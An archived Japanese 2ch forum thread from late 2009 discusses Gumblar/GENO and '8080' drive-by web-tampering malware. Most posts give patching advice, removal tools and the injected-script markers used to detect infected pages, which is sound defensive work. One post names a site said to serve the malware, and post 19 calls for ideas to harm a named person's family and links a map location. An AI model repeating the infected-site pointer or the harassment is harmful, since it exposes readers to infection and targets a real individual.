【Gumblar/GENO】Web改竄ウイルス総合スレ【8080】

[表示 : 全て最新50 1-99 101- 201- 301- 401- 501- 601- 701- 801- 901- 1001- 2chのread.cgiへ]
Update time : 10/13 16:19 / Filesize : 238 KB / Number-of Response : 1002
[このスレッドの書き込みを削除する]
[＋板最近立ったスレ＆熱いスレ一覧 : ＋板最近立ったスレ／記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

1 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/27(日) 04:20:21 ]: 改ざんされたWebページを経由して感染するウイルスの情報・対策スレです

ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加しているようなら別スレを立てて誘導してください

現時点でGumblar(GENO)、8080(/*GNU GPL*/ や /*CODE1*/)
JustExploitなどのインジェクションが流行しています
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう

＊＊＊危険なサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください＊＊＊
＊＊＊感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します＊＊＊

【関連スレ】
GENOウイルススレ　★23
pc11.2ch.net/test/read.cgi/sec/1259607683/
2 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/27(日) 04:21:08 ]: 【脆弱性を利用されやすいソフトウェア】
下記については必ずアップデートしてください
使用していないものはアンインストール推奨です

■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
　ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
　編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意！)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic
3 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/27(日) 04:21:48 ]: 【アップデート支援ツール】
■ アプリケーションの脆弱性確認ツール
・MyJVN バージョンチェッカ
ttp://jvndb.jvn.jp/apis/myjvn/
・Secunia Personal Software Inspector (PSI)
ttp://secunia.com/vulnerability_scanning/personal/
■ Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」
ttp://www.forest.impress.co.jp/docs/review/20091020_323014.html
ttp://hide9999.web.fc2.com/
4 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/27(日) 04:23:10 ]: 【Gumblar.x / Daonol(新GENO)ウイルスについて】
■ Gumblar被害拡大中(1)(2)(3)
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2092
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2093
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2094
■ Windowsが起動しないときの復旧方法の一例
黒い画面にマウスカーソル (Win32/Daonol)
ttp://blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx
Win32/Daonolの亜種に感染！セーフモードでも起動できないパソコンを復旧するには？
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20091028/339633/?ST=security&P=1
レジストリの修復 Windowsを使わずに修復してみる
ttp://pctrouble.lessismore.cc/boot/recover_registry.html
■ 感染確認・駆除ツール
アンラボ(v3daonol.exe)
ttp://www.ahnlab.co.jp/download/vdn_list.asp
マカフィー(stinger.exe)
ttp://www.mcafee.com/japan/mcafee/support/announcement20091127.asp
Kaspersky(KatesKiller.exe)
ttp://support.kaspersky.com/faq/?qid=208280701

【旧Gumblar(GENO)ウイルスのまとめなど】
＊＊＊【注意！】2009年10月からのGumblar.x / Daonol(新GENO)には無効な情報があります＊＊＊
■ Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
■ GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
5 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/27(日) 04:24:11 ]: 【8080系ウイルスについて】
Gumblar系とは別種のウイルスで、最近のものはページソースの最後あたりに
<script>/*GNU GPL*/
または
<script>/*CODE1*/
から始まる難読化したスクリプトが埋め込まれています
2009年12月現在、最新版のAdobe Readerおよびそれ以前の脆弱性を利用しているため
回避策としてAcrobat Javascriptのチェックを外してください
修正版の配布は2010年1月13日の予定です
他にもMicrosoftとJRE(Java Runtime Environment)の脆弱性を利用していますが
こちらはアップデートで対処できます
感染すると他のウイルスなどを呼び込むため非常に危険です
■ 新手の正規サイト改ざんでAdobe Readerのゼロデイ攻撃～今すぐ対策を
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2106
6 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/27(日) 04:25:02 ]: ●IPA 情報処理推進機構
Windowsの自動実行（オートラン）機能を無効にする ※USBメモリの使用に関わらず必ず設定しておくこと！
ttp://www.ipa.go.jp/security/txt/2009/05outline.html

・Microsoft Updateは確実に適用しましょう（*「カスタム」選択更新で適用にエラーが無いか？は確認出来ます）
・ブラウザの「インターネットゾーン」のセキュリティ設定項目は、自分でよく理解して管理しておきましょう
　感染するとブラウザ設定を低下させたり、悪意のあるサイトURLを信頼済みサイトへ登録するスパイウェアも存在します

・普段のブラウズは、サードパーティCookieをブロックする設定以上にしておけばスパイウェア予防にもなります
・「アドオンの管理」から、普段ブラウザで読み込まれるアドオン（Webブラウザ拡張機能）の内容は把握しておきましょう
・ソフトウェアやブラウザ（Webプラグイン類も）の最新版Updateとセキュリティ設定を常に心掛けましょう
　（*Adobeソフト、動画Player、圧縮解凍ソフト、Office系ソフト、Mailソフト、Sun MicrosystemsのJavaなど）
　（*普段、使わないようなWebプラグイン類はアンインストールしておきましょう → 必要時だけ最新版を使用する）

・インターネット上の「無料で配布されているモノ」は、基本的には“疑って”下さい（*VirusTotal.comスキャンを活用）
・怪しいメールや圧縮ファイルは、絶対に開かないようにしましょう（*危険な餌に釣られない用心を持ちましょう）
・週に何回かは、Nortonで「システムの完全スキャン」を実行しましょう
・スキャンでリスクが検出された場合、駆除と同時にSymantecのサイトでリスクによる「被害内容」を確認しましょう
・「タスクマネージャーの常駐プロセスexe」の内容も把握しておきましょう
・Windowsの付加的「サービス」は、攻撃の侵入経路に利用されることもあるので脆弱性となる項目は停止しておきましょう
・大事なIDやパスワードの自己管理には十分に注意しましょう（*IDセーフ機能も活用）

●Webサイトの脆弱性、IPAから指摘しても6割が対応未完了　2009/7/24
サイト運営者やDNSサーバー管理者、Webアプリケーションの開発者に対して脆弱性の確認と対策の実施を求めている
ttp://internet.watch.impress.co.jp/docs/news/20090724_304366.html
7 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/27(日) 04:25:21 ]: ＊＊＊テンプレ終了＊＊＊

抜け、間違いがあれば指摘よろ
8 名前：1 mailto:sage [2009/12/27(日) 04:26:14 ]: ごめん続けて
9 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/27(日) 04:26:15 ]: Norton +α Defense （Method of JAPAN Norton Forum）

・「a-squared Free 4.5」ウイルス・トロイの木馬のスキャンと駆除（*常駐保護は無し *日本語インターフェイス）
　 ttp://www.emsisoft.com/en/software/free/
　サービス > 「a-squared Free Service」を無効 > 停止 > 適用で｢自動Update常駐 a2service.exe｣の停止＝手動Update
・「a-square MalAware 1.0」クラウドスキャナ（*クイッククラウドチェック、a-squared Freeとの併用がベストです）
　 *インストール不要　*頻繁にプログラムアップデートしているので都度ダウンロードして試してみて下さい
　 ttp://www.emsisoft.com/en/software/malaware// （ttp://i46.tinypic.com/2gtnn2x.jpg
）
・「Malwarebytes' Anti-Malware 1.42」ウイルス・スパイウェアのスキャンと駆除（*常駐保護は無し *手動Update）
　 ttp://www.malwarebytes.org/mbam.php　（*「Protection」ページの機能はNortonとの共存の為に設定しないで下さい）

・「ReducedPermissions」（手動Windows Updateやオンラインスキャンはエラーに *導入時には｢ブロックの解除｣設定を）
・「Spyware Blaster 4.2」危険サイトの制限、危険ActiveXの実行制限処置（*手動Update *Flash Killer機能も実用的です）

・「Live OneCare PC セーフティ（オンラインスキャン *駆除も可能 *月1・2回程度のチェックでOK）」
　 ttp://onecare.live.com/site/ja-jp/default.htm?s_cid=sah
・「a-squared HiJackFree 3.1」 ttp://www.hijackfree.com/en/ (*詳細な自己診断ビューア *日本語インターフェイス)
　 (*インストール後、歯車アイコンから一度アップデート → その後はオフでOK　ttp://i45.tinypic.com/3022nwz.jpg
)
10 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/27(日) 04:26:56 ]: ■詐欺・罠サイトURLの報告 - Symantec Security Response 〔Report Suspected Phishing Sites〕
https://submit.symantec.com/antifraud/phish.cgi　（記入例 ttp://i38.tinypic.com/k1xhjm.jpg
）
　*ワンクリック詐欺や詐欺ソフトのダウンロードを仕向けるURLの報告（*複数の場合はenter moreで報告枠追加できます）
　*インターネット中に、奇妙な動作を感じたページや、悪意のある動画やゲーム系サイトの報告もOK
　*思わぬサイトへ飛ばされた場合などは、リンク元ボタンを右クリック > プロパティでURL確認

■未対応リスクや疑わしいファイルを検疫経由でSymantecへ送信（*最大10MB以下？までのサイズ）
タスクトレーのNortonアイコンを右クリック「最近の履歴を表示」 > 「検疫」を選択
検疫に追加（*明らかに未対応リスクである場合は、「ディスクからファイルを削除」にチェック（＝検疫と同時に削除））
検疫後、「詳細」 > 下列にある「処理」 > 「Symantecへ提出」をクリック
■疑わしいファイルの提出 - Symantec Security Response 〔Upload a suspected infected file〕
*ファイルや圧縮ファイル〔Password無し、File数9個未満、10MB未満〕やtxtレポートで調査依頼の提出が出来ます
https://submit.symantec.com/websubmit/retail.cgi　（記入例 ttp://i36.tinypic.com/bhj8ye.jpg
）

■Nortonが誤検出してしまうファイルの報告 - Symantec Security Response 〔False Positive Submission〕
https://submit.symantec.com/dispute/false_positive/　（記入例 ttp://i38.tinypic.com/2itmwjs.jpg
）

●JVN iPedia -脆弱性対策情報データベース（*使用しているソフトウェアの最新版への更新を心掛けましょう）
「脆弱性」とは、ソフトウエア製品やウェブアプリケーション等におけるセキュリティ上の問題箇所（ウィークポイント）です
ttp://jvn.jp/report/index.html
■「ttp://www.virustotal.com/jp/」（37社のファイルスキャンサービス *圧縮ファイルの状態でもOK）
■「ttp://onlinelinkscan.com」（4種類のサイト安全性チェックを一度に　PhisTank ，AVG ，SiteTruth ，Google Safe Browsing）
■「ttp://www.gred.jp（セキュアブレイン gred）」（国産サイト安全性チェックサービス … ワンクリ詐欺，Web攻撃の有無など）
11 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/27(日) 04:27:38 ]: 「漫画・イラストも児童ポルノ規制対象に」約9割──内閣府調査　2007/10/25
ネット上の「有害情報」を規制すべきという回答も約9割に上った
ttp://www.itmedia.co.jp/news/articles/0710/25/news140.html
オークション詐欺にひっかからないように、犯人の手口を頭に入れておきたい　2009/02/20
ttp://www.yomiuri.co.jp/net/security/goshinjyutsu/20090220nt0f.htm
「YouTube」に投稿された動画のうち，最大で約4900本のコメント欄に，悪意あるWebページへのリンク　2009/05/25
ttp://itpro.nikkeibp.co.jp/article/NEWS/20090525/330580/
米IBMは2009年上半期のセキュリティ動向を報告し、Webを通じた脅威がかつてないほど危険な状態にあると警告　2009/08/27
ttp://www.itmedia.co.jp/enterprise/articles/0908/27/news080.html
「OSよりもアプリケーションが狙われる」、セキュリティ組織が警告　2009/9/16
Adobe ReaderやFlash Playerなどの脆弱性が危ない、「すぐに解消を」
ttp://pc.nikkeibp.co.jp/article/news/20090916/1018638/
米連邦捜査局（FBI）が、SNSを舞台にした犯罪が増えていると注意を呼びかけ　2009/10/2
　Social Network Service ＝さまざまな参加呼びかけ型コミュニケーションサイト
ttp://www.computerworld.jp/topics/vs/163829.html
個人情報をさらすマルウェア、ポルノゲームのインストールファイルを装って流通している　2009/11/30
ttp://www.itmedia.co.jp/enterprise/articles/0911/30/news010.html
ワンクリック不正請求トラブル、相談事例が半年で1万7794件　2009/12/4
ttp://internet.watch.impress.co.jp/docs/news/20091204_333169.html
Gumblar被害拡大中(3) 予防対策：一般ユーザーの方、サイト管理者の方へ　2009/12/11
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2094
12 名前：◇テンプレここまで mailto:sage [2009/12/27(日) 04:29:25 ]: ＊＊＊テンプレ終了＊＊＊
13 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/27(日) 04:30:48 ]: いきなり荒らし？
>>9-11ってノートンスレのテンプレであって関係ないよな？
14 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/27(日) 05:23:44 ]: 「漫画・イラストも児童ポルノ規制対象に」約9割──内閣府調査　2007/10/25
ネット上の「有害情報」を規制すべきという回答も約9割に上った
ttp://www.itmedia.co.jp/news/articles/0710/25/news140.html
オークション詐欺にひっかからないように、犯人の手口を頭に入れておきたい　2009/02/20
ttp://www.yomiuri.co.jp/net/security/goshinjyutsu/20090220nt0f.htm
「YouTube」に投稿された動画のうち，最大で約4900本のコメント欄に，悪意あるWebページへのリンク　2009/05/25
ttp://itpro.nikkeibp.co.jp/article/NEWS/20090525/330580/
米IBMは2009年上半期のセキュリティ動向を報告し、Webを通じた脅威がかつてないほど危険な状態にあると警告　2009/08/27
ttp://www.itmedia.co.jp/enterprise/articles/0908/27/news080.html
「OSよりもアプリケーションが狙われる」、セキュリティ組織が警告　2009/9/16
Adobe ReaderやFlash Playerなどの脆弱性が危ない、「すぐに解消を」
ttp://pc.nikkeibp.co.jp/article/news/20090916/1018638/
米連邦捜査局（FBI）が、SNSを舞台にした犯罪が増えていると注意を呼びかけ　2009/10/2
Social Network Service：さまざまな参加呼びかけ型コミュニケーションサイト
ttp://www.computerworld.jp/topics/vs/163829.html
セキュアブレインが、「Gumblerウイルス」と類似した新たな攻撃手法を確認　2009/10/23
企業に「gredセキュリティサービス　無償トライアル版」を利用し、自社ウェブサイトの検査を行うよう呼びかけ
ttp://antivirus-news.net/2009/10/gumbler.html
迷惑メールからあなたを守るためのチェックリスト　2009/11/10
tp://japan.zdnet.com/news/sec/story/0,2000056194,20403268,00.htm
15 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/27(日) 05:24:56 ]: 「漫画・イラストも児童ポルノ規制対象に」約9割──内閣府調査　2007/10/25
ネット上の「有害情報」を規制すべきという回答も約9割に上った
www.itmedia.co.jp/news/articles/0710/25/news140.html
オークション詐欺にひっかからないように、犯人の手口を頭に入れておきたい　2009/02/20
www.yomiuri.co.jp/net/security/goshinjyutsu/20090220nt0f.htm
「YouTube」に投稿された動画のうち，最大で約4900本のコメント欄に，悪意あるWebページへのリンク　2009/05/25
itpro.nikkeibp.co.jp/article/NEWS/20090525/330580/
米IBMは2009年上半期のセキュリティ動向を報告し、Webを通じた脅威がかつてないほど危険な状態にあると警告　2009/08/27
www.itmedia.co.jp/enterprise/articles/0908/27/news080.html
「OSよりもアプリケーションが狙われる」、セキュリティ組織が警告　2009/9/16
Adobe ReaderやFlash Playerなどの脆弱性が危ない、「すぐに解消を」
pc.nikkeibp.co.jp/article/news/20090916/1018638/
米連邦捜査局（FBI）が、SNSを舞台にした犯罪が増えていると注意を呼びかけ　2009/10/2
Social Network Service：さまざまな参加呼びかけ型コミュニケーションサイト
www.computerworld.jp/topics/vs/163829.html
ネット検索は信用できない？ユーザー詐称する広告代理店を処罰　2009/10/28
盗んだ個人情報で4900個ものアカウントを作り、一般ユーザーのふりをして「ここがよかったよ～」と、
特定のお店やWebサイトの宣伝をしていた。つまり、私達が利用したのは知識検索ではなく広告検索だった
ttp://pc.nikkeibp.co.jp/article/column/20091028/1019904/
ミクシィ、４２００人情報"露出"…ゲーム課金不具合　2009/11/04
実際に制作・運営しているのは中国のゲーム会社「リクー・メディア」
ttp://www.yomiuri.co.jp/net/security/ryusyutsu/20091104-OYT8T00323.htm
16 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/27(日) 05:28:46 ]: 【ヤフオク】Nortonキー出品まとめ②・悪い評価
■fantastic_kids_1999
特別に提供されたものを使用したが使えなかった。代替えとおまけで他の出品も提供されたがそれも使えなかった。
結局何も使えなかった。こんなやつの出品は所詮こんなもんでしょう。 (評価日時：2009年 6月 13日 15時 11分)
■intelli2009
プロダクトキーが使えなくなり、有効期間も０日に…詐欺でしょうか？(評価日時：2009年 9月 17日 7時 03分)
■number2009livecn（停止中）
期限切れ (評価日時：2009年 11月 5日 11時 08分)
■uxk1216
落札当初、２年間の有効期限と説明を受けていたが、３ヶ月目で更新期限切れが来てしまいました、
どういう事でしょうか？ (評価日時：2009年 10月 25日 22時 24分)
■min9763557（停止中）
購入時は認証できましたが、３ヶ月もせず期限切れになりました。許せません。 (評価日時：2009年 11月 12日 17時 29分)
■yuanchong525
こいつはすぐに期限が切れるものを売りつけてます。詐欺です。
まあ騙された自分が馬鹿だったんですけど、みなさんも気をつけてください。(評価日時：2009年 9月 13日 22時 49分)
■seven_stars_king2000
Yahoo! JAPAN IDが無効です。
■andriy_shevchenko1976929
Yahoo! JAPAN IDが無効です。
■bottega_choice（停止中）
落札、代金支払後に取引停止となり、メール送信しても連絡無く、最悪です。 (評価日時：2009年 10月 20日 17時 03分)
■wxk1216（停止中）
海賊版でした。7日後に期限切れになりました。サポートも不可 (評価日時：2009年 10月 7日 21時 41分)
17 名前：名無しさん＠お腹いっぱい。 [2009/12/27(日) 05:34:27 ]: 　　　　　　　　　　＿＿＿_
　　ｎ　　　　　　／⌒　　⌒＼
　　| |　　　　／（＞）　（＜）＼
　 i｢|^|^ﾄ、／::::::⌒（__人__）⌒::::＼ >>1乙だお！
　|: ::　 ! } |　　　　/| | | | |　　　　　 |
　ヽ　　,ｲ＼　 (、`ー―'´,　　　／
18 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/27(日) 10:39:45 ]: いきなり嵐にはわろうた
19 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/27(日) 10:41:55 ]: あかかげまるの家庭を壊す案を広く募集いたしております。
www014.upp.so-net.ne.jp/BANBI/png/top.png
ちなみに地図はこちらです。
www.mapion.co.jp/m/34.6591819444444_135.453802777778_9/
20 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/27(日) 15:40:24 ]: >>1乙

8080(/*GNU GPL*/ や /*CODE1*/）って
いまのところ検知するのノートンとAVASTだけなの？
他のソフトはスキャンでもスルー？
21 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/27(日) 15:57:14 ]: >>20
カスペも検知する。
22 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/27(日) 16:04:28 ]: >>21
(/*GNU GPL）踏んでカスペオンラインチェックで出てこなかったってどっかで見たけど
23 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/27(日) 16:12:49 ]: 8080系で>>4みたいな感染確認は無いですかね？
24 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/27(日) 16:19:57 ]: スクリプトをいくつか踏んでみたけど、どうもまちまちみたい
定義ファイルの結果だから実際はもう少し検出するだろうけど
日付はindex.htmlのもの

/*GNU GPL*/
24日　結果: 7/41
ttp://www.virustotal.com/jp/analisis/c2c5b1338529ba08848f0f25c4e8119d52e7dfcab3358b55619e38232f8af827-1261897615
26日　結果: 0/41
ttp://www.virustotal.com/jp/analisis/bbb1b07545f46b6310ef1d8508e31437531a89a58e0cf263590bc4bce8ae68b9-1261896683

/*CODE1*/
22日　結果: 9/41
ttp://www.virustotal.com/jp/analisis/30bd85a231595bbee6fad3b8fa1b1931d6851c6187ca0f55d61a51b07975d38a-1261896524
25 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/27(日) 16:45:21 ]: >>23
一例としてsiszyd32.exeをスタートアップに登録するみたいだ
もっともこれが他のウイルスを呼び込むから
感染してたらどうなっているやら・・・

ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2102
ttp://htlogs.com/what-is-siszyd32-exe-how-to-remove-siszyd32-exe/
26 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/27(日) 16:47:56 ]: 感染の疑いがある場合はAvastとか検出報告のあるソフトで試してみるしか確認も出来ないってことですか？
ポートチェッカーで80や8080が解放されてるものの応答は無し判定だったんですが
やはり黒でしょうか
27 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/27(日) 17:14:33 ]: >>26
avast!は比較的スクリプトには反応するが
ウイルス本体を検出するかは検体を持っていないから分からない
個人的な印象になるが、ウイルス名やファイル名でググって見ると
本体の検出はKaspersky・Microsoft・Symantecあたりが強そうかな？

PCに詳しくないなら
ウイルス対策ソフトでフルスキャンをかけていろいろ検出したら
クリーンインストールが無難だろうな
28 名前：26 mailto:sage [2009/12/27(日) 17:32:24 ]: >>27
そうですか･･･
一応常駐インスコしてあるマカフィーでフルスキャン、カスペオンラインでスキャン
トロイスレに貼ってあったトロイスキャナーでオンラインスキャンして
何一つ検出されませんでした
（トロイスキャナーで有害度の低いクッキーがちょろっと出てきたのみ）
siszyd32.exeも出てこずMSアップデートも問題なく、再起動も出来てるのですが
これはもう白なんですかね
一日経過しましたが、いまのところプロセスにおかしな挙動をしているものは見当りません

確かに踏んだサイトには/*GNU GPL*/ のスクリプトが挿入されてたようなんですが
29 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/27(日) 17:35:36 ]: あ、あとsymantecのポートチェックもやりましたがこっちは全部白でした
（8080系のポートはチェック対象外のようでした）
30 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/27(日) 18:11:36 ]: >>28
それだけスキャンしてクッキーくらいなら白、なんだろうな
どういう経緯で感染したと思ったのかが分からないが
サイト踏んだと同時にアンチウイルスが反応したんなら
水際で阻止しているだろうし、アップデートで対策されてたら問題ないはず
31 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/27(日) 18:43:17 ]: >>30
いえ、あっちのスレこっちで黒判定されてるサイトを迂闊に踏んでしまって
（偶然すぐに閉じてはいたのですが、マカフィーは無反応
その時は感染サイトだとは気付かず）
感染サイトだと知ってから携帯で該当サイトをもう一度踏んでみて、サイトの最下部に/*GNU GPL*/ を含む
恐らく難読化されたスクリプトが挿入されてるのを見まして

ちなみに踏んだのはGENOスレ290注意喚起されてたサイトなのですが、現在ではスクリプト部分は削除されているようで
今となっては再びの確認が取れません

IEでJAVAスクオンで踏んだんですが、何故生き残ったのか･･･
生き残ったのなら幸いですが、定義ファイルが追いついていないだけだとすると怖いものがあります
とりあえず様子見してみます。ありがとうございました
32 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 00:17:17 ]: >>24
ノートンは実際にサイトに訪問したとき反応する
virustotalでスクリプトの部分をスキャンしても反応しない
33 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 00:27:56 ]: つまり一度感染したらAVAST以外で確かめる術がないってこと？
でもAVASTも誤検出騒ぎで落ち着かないよな
どうすりゃいいんだ
34 名前：32 mailto:sage [2009/12/28(月) 00:38:53 ]: >>33
感染後のことは知らない
あくまでもスクリプトのスキャンの話
35 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 00:42:02 ]: >>34
ああそうか、スマン読み違えてた
36 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 00:44:32 ]: >>33
どっかに書かれているだろうど
OSに最新のアップデートを適用しておく
Adobe製品やSunのJavaなどがインストールされていれば同様にアップデートしておく
Adobe ReaderはJavaScriptを切っておく

どうしても不安ならwebブラウザのJavaScriptを切っておけばほぼ無害
機種によるかも知れないがルーターで切ることも出来る
37 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 00:45:56 ]: >>36
いや感染（疑い）後の話よ
どのスキャンでも上がってこないらしいじゃん
38 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 00:50:27 ]: あとはHIPSの強力なファイアウォールなどのセキュリティ製品を使う
設定もよりきつめにすれば思わぬマルウェアの実行やファイルやレジストリの書き換えも防げる
確証はないがほぼ防げるんじゃないだろうか
Outpost、Comodo、Online Armor、PC toolsなど
39 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 00:52:47 ]: >>37
感染後はどうなるのかと言う情報ある？
40 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 00:54:28 ]: >>37
そこまで心配する人なら、疑いのあるサイト行ってしまった自覚があるならOSごとクリーンインスコが精神上一番良いと思う
日々コードも引き連れてくるマルウェアも変化してるものに、どこのベンダーのものが100%検知可能！とか言えない
GumblarなんてHijackThisでも見つけにくいとか報告あったし
41 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 00:56:23 ]: あと肝心なことは
感染してもすぐに復旧できるようにバックアップを取っておく
42 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 00:57:48 ]: >>39
ない
踏んだって話は色々見かけるが、どうなったっていうレスを見ない
誰か実際やった奴いないんだろうか
43 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 01:01:23 ]: 8080系はいわゆるダウンローダーで
次々にウイルスをダウンロードしては実行するので
感染したが最後、収拾がつかなくなるはず

だからダウンローダーを削除しても他のウイルスに
感染している可能性が高い
ある意味Gumblarよりたちが悪い

ここの下あたりに動作が記載されてる
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2102
44 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 01:02:38 ]: webサイトを管理してるなら
パスワードを変更するのも忘れずに

感染しても今のところweb改竄の被害を受けるだけなのかな
俺がはやりのGNU GPLのスクリプト試したときはpdfup.exeと言うのが落ちてきただけだったな
45 名前：名無しさん＠お腹いっぱい。 [2009/12/28(月) 01:10:34 ]: view-source:digimaga.net/

<script>/*GNU GPL*/・・

デジマガ、アウト。
46 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 01:10:34 ]: 試す環境がある人でも2回目のアクセスの時は404返すようになったりと素晴らしい工夫がなされてたりして
検証しにくかったりするんだよな
俺は仮想環境とかないのでやったことないけど・・・・

>>44
パスワード変更するのは良いが、感染してないって言い切れる環境でのパスワード変更ってのが必須だな
感染してる環境からパスワード変更はまったく意味ないしｗ

8080系の奴ってSo-netの記事によると、改竄だけじゃ済まないみたいよ
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2104
>ちなみに、攻撃成立時に実行されるウイルス本体は、「Bredolab」や「HDrop」で検出されたり、汎用名で検出されたり、検出できなかったりと、こちらも微妙だ。
>困ったことに、このウイルスは他の不正なプログラムをダウンロード・実行するのが主な役目で、実行時にシステムに何がインストールされたかがわからない。
>情報を盗み取るスパイウェアやパスワードスティーラ―、外部からパソコンを操るためのボット、偽ウイルス対策ソフトなど、これまでに様々な脅威をインストールして来た系列のウイルスだ。
47 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 01:12:08 ]: >>45
志村ー、URLURL
48 名前：名無しさん＠お腹いっぱい。 [2009/12/28(月) 01:13:04 ]: >>45
貼っちまったよ・・。
対策ない奴は、絶対開くなよ。
49 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 01:14:32 ]: >>46
分からないって書いてあるじゃん
分かってないのか分かってないのか微妙な文章だが
50 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 01:15:42 ]: 分かってないのか分かってるのか微妙な文章だｗ
最後はこういうウイルスの一般的な動作を述べてるだけじゃないか
51 名前：46 mailto:sage [2009/12/28(月) 01:17:22 ]: レスした後再度読み直してみたら、微妙な文章ですね・・・
まあでも、最悪こういう自体になりかねないよって言う脅しには良いんじゃないかと・・・
52 名前：名無しさん＠お腹いっぱい。 [2009/12/28(月) 01:29:27 ]: >>45
ＪＲ東日本のサイト改ざん。『/*GNU GPL*/』の不正なJavaScriptコード
blogs.yahoo.co.jp/noooo_spam/59306006.html

コレと一緒っぽいな。
53 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 01:30:41 ]: 万一に備えてシステムをバックアップ
True Imageなどのシステムをバックアップするソフトがない場合

お薦めフリーソフト

Paragon Backup & Recovery 10 Free Edition
www.paragon-software.com/home/db-express/index.html
起動メディアを作っておけば起動メディアから復元はもちろんバックアップも出来る

Macrium Reflect FREE Edition
www.macrium.com/ReflectFree.asp

EASEUS Todo Backup
www.todo-backup.com/
54 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 01:33:13 ]: たしかアニたまのサイトもそれだった気がするんだが
あんまり大きな騒ぎにはならなかったよな
潜伏してるのが多いのか？
55 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 01:38:04 ]: 今騒ぎになってきてるじゃないですか。ゼロデイ突いてくるドライブバイダウンロードが有名サイトにぞくぞくとってことで
56 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 01:41:11 ]: adobeもjavascriptとか最初から危なっかしいの分かるような機能入れるなよ
ちゃんと対応できるならまだしも全然駄目じゃないか
アホすぎ
